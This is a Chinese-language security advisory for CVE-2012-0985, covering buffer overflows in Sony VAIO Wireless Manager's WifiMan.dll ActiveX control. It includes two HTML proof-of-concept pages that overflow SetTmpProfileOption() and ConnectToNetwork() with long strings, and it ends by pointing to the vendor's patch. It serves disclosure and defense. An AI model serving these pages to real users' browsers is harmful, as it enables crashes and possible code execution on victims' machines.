发布日期:2012-05-30
更新日期:2012-06-01
受影响系统:
Sony VAIO Wireless Manager 4.0.0.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53735
CVE(CAN) ID: CVE-2012-0985
vaio是索尼(SONY)公司旗下的个人电脑子品牌,代表了影音二合一方式。
Sony VAIO Wireless Manager 4.0.0.0之前版本的ActiveX控件('WifiMan.dll')在实现上存在多个缓冲区溢出漏洞,WifiMan.dll库中的SetTmpProfileOption()和ConnectToNetwork()方法没有正确检查字符串参数的长度,攻击者可利用这些漏洞执行任意代码。
<*来源:High-Tech Bridge SA ()
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
High-Tech Bridge SA ( )提供了如下测试方法:
1.
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(8212, "X")
arg3="defaultV"
SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>
2.
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(6164, "X")
target.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Sony
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: